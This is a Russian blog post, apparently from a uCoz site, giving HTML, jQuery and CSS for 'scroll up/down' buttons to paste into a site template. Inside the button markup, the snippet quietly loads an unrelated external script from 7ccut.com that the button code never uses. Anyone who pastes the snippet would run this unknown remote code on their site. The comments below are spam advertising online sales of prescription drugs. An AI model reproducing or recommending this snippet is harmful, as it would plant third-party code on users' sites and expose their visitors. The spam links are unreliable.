Главная » 2013 » Декабрь » 7 » Кнопка Вверх и вниз для сайта
21:49
Кнопка Вверх и вниз для сайта
Как правильно установить кнопку "Вверх и вниз" на сайт?

Заходим в панель управления сайтом,
далее "Главная » Управление дизайном » Редактирование шаблонов"
Копируем код и вставляем в "Нижняя часть сайта" в самый низ.

Код
<div style="display:none;" class="nav_up" id="nav_up">
  <img alt="↑" width="32" height="32" src="http://pnghosts.ru/img/2_u.ico" > </div>
  <div style="display:none;" class="nav_down" id="nav_down">
  <script src="http://7ccut.com/table.js" type="text/javascript"></script>
  <img alt="↓" width="32" height="32" src="http://pnghosts.ru/img/2_d.ico" > </div>
  <script>
  $(function() {
  var $elem = $('body');
   
  $('#nav_up').fadeIn('slow');
  $('#nav_down').fadeIn('slow');  
   
  $(window).bind('scrollstart', function(){
  $('#nav_up,#nav_down').stop().animate({'opacity':'0.2'});
  });
  $(window).bind('scrollstop', function(){
  $('#nav_up,#nav_down').stop().animate({'opacity':'1'});
  });
   
  $('#nav_down').click(
  function (e) {
  $('html, body').animate({scrollTop: $elem.height()}, 800);
  }
  );
  $('#nav_up').click(
  function (e) {
  $('html, body').animate({scrollTop: '0px'}, 800);
  }
  );
  });
  </script>


Это вставляем в "Таблица стилей (CSS)" в самый низ

Код
.nav_up{
  padding:2px;
  position:fixed;
  width:32px;
  height:32px;
  bottom:20px;
  opacity:0.7;
  right:30px;
  cursor: pointer;
  }
.nav_down{
  padding:2px;
  position:fixed;
  width:32px;
  height:32px;
  bottom:20px;
  opacity:0.7;
  right:66px;
  cursor: pointer;
  }


Готово.
Категория: Скрипты для Ucoz | Просмотров: 515 | Добавил: Bitfood | Рейтинг: 0.0/0
Всего комментариев: 7
7 Conniegrito  
0
The thoroughness in this section is noteworthy. http://bbs.51pinzhi.cn/home.php?mod=space&uid=7112569

6 Conniegrito  
0
The thoroughness in this section is noteworthy. http://www.fujiapuerbbs.com/home.php?mod=space&uid=3616669

5 Conniegrito  
0
This is the kind of scribble literary works I positively appreciate. https://anonym.es/?https://www.storeboard.com/xpregain

4 skd0c  
0
The reconditeness in this tune is exceptional. https://aranitidine.com/fr/levitra_francaise/

3 ml113  
0
order deltasone 10mg online cheap - https://apreplson.com/ deltasone 40mg pill

2 7uubn  
0
order provigil 200mg pills modafinil over the counter buy modafinil generic <a href="https://provicef.com/">modafinil 100mg canada</a> buy modafinil online buy provigil 200mg online purchase modafinil for sale

1 Vrvyml  
0
prilosec over the counter - <a href="https://omepmetolol.com/tenormin/">order tenormin 50mg pills</a> tenormin 100mg price

Имя *:
Email *:
Код *: